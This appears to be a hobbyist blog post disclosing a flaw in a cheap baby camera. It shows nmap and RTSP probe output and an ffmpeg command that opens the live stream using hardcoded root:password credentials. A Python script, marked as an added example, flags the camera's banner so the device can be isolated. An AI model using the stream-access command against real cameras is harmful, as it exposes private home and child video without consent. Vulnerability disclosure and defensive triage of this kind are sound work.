
CVE-2024-46959 - hacking the runofast 10$ baby cam with firmware version CloudCam 57.0.0.1

posted on : 9/07/2024

so vulnerable!!!!

my first hacking blog poast whoa

good evening. so this story begins in the middle of the night when i was really bored and wanted to find something to hack. i had made the rounds on my home network and it really wasnt working out. so i took a chance and bought some security cams on the web and a day later two arrived at my door.


tonight's victim!

so asclepius, what happened?

the cameras turned out to be really shitty as expected, but today ill be focusing on the runofast one, because i think it's the easier one. so i ran some nmap scans on it like we all do, output follows. (censoring out the last two octets of the addr because im cool)

    

        Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-04 21:56 PDT
        Nmap scan report for 192.168.xx.xx
        Host is up (0.019s latency).
        Not shown: 997 closed tcp ports (conn-refused)
        PORT     STATE SERVICE
        80/tcp   open  http
        554/tcp  open  rtsp
        8001/tcp open  vcom-tunnel
        
        Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
    

now i had no idea wtf an rtsp was!! however i did have the ability to use a -A flag, which turned the 8001 into rtsp too...so i did some research into some flags that i was getting returned when i curled it.

    
        *   Trying 192.168.xx.xx:8001...
        * Connected to 192.168.xx.xx (192.168.1.12) port 8001
        > OPTIONS * RTSP/1.0
        > CSeq: 1
        > User-Agent: curl/8.9.0
        > 
        * Request completely sent off
        < RTSP/1.0 200 OK
        < CSeq: 1
        < Server: TAS-Tech Streaming Server V100R001
        < Public: DESCRIBE, SET_PARAMETER, SETUP, TEARDOWN, PAUSE, PLAY
        < 
        * Connection #0 to host 192.168.xx.xx left intact
    

this was a little weird! at this point i had tried to run the describe, play, and other params like that into the curl command. during this, i also ran it with the root:password params just to see if it worked. no dice!!!! say...this was the real time streaming protocol....


SO! i went to our lord and savior, ffmpeg and decided to just test some params in it and it did not look good! here's the command:

    
        ffmpeg -i rtsp://root:[email protected]:554/stream1 -rtsp_transport tcp -c copy -t 00:00:01 554.mp4
    

doctors hate her! she took one command this was the result:

that's me! through the camera! with basic creds! which is not at all like safe. i kinda broke it before i could test more creds to see if it even was default credential issue vs a broken access one, so give me $$$ to get another one if you want a continuation of it!


so i also after the fact tried to find the company's yknow email or anything to say hey i can see myself in your camera! but alas i couldn't. if you are from that company and care about this at all heyyyy this is really insecure and bad. if you value your privacy i would not buy this at all tbh. again, this credential cannot be changed in any way that i've seen, meaning this thing comes with unchangeable hardcoded credentials that are basic and at the top of all wordlists out there.
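since the credential can't be changed, the practical fix is finding these cameras on your own network and fencing them off. the sketch below is an added example, not part of the original post and not vendor code: it parses saved RTSP `OPTIONS` replies offline and flags the `Server` banner seen in the curl output above. the function names and the watchlist are assumptions, and the sample reply is constructed from that curl output.

```python
# Added example: offline triage of captured RTSP OPTIONS replies.
# SAMPLE_REPLY is constructed from the curl output shown in the post.
SAMPLE_REPLY = (
    "RTSP/1.0 200 OK\r\n"
    "CSeq: 1\r\n"
    "Server: TAS-Tech Streaming Server V100R001\r\n"
    "Public: DESCRIBE, SET_PARAMETER, SETUP, TEARDOWN, PAUSE, PLAY\r\n"
    "\r\n"
)

# Assumption: banners the auditor wants flagged; only the one seen in the post.
WATCHLIST = {"tas-tech streaming server v100r001"}


def parse_rtsp_reply(raw):
    """Return (status_code, headers) for an RTSP reply, or raise ValueError."""
    lines = raw.replace("\r\n", "\n").split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("RTSP/") or not parts[1].isdigit():
        raise ValueError("not an RTSP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header section
        name, sep, value = line.partition(":")
        if sep:  # skip lines without a colon instead of failing the whole reply
            headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def triage(raw, watchlist=WATCHLIST):
    """Summarise one reply: banner, advertised methods, and whether to isolate it."""
    status, headers = parse_rtsp_reply(raw)
    banner = headers.get("server", "")
    methods = [m.strip().upper() for m in headers.get("public", "").split(",") if m.strip()]
    return {
        "status": status,
        "banner": banner,
        "methods": methods,
        # A banner match is a lead for follow-up, not proof of the same firmware.
        "flagged": banner.lower() in watchlist,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_REPLY))
```

anything flagged belongs on an isolated VLAN with ports 554 and 8001 blocked from the rest of the network.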

final words:

thanks for reading my first ever actual hacking post, idk if this is a vuln or a cve or whatever but here u go!!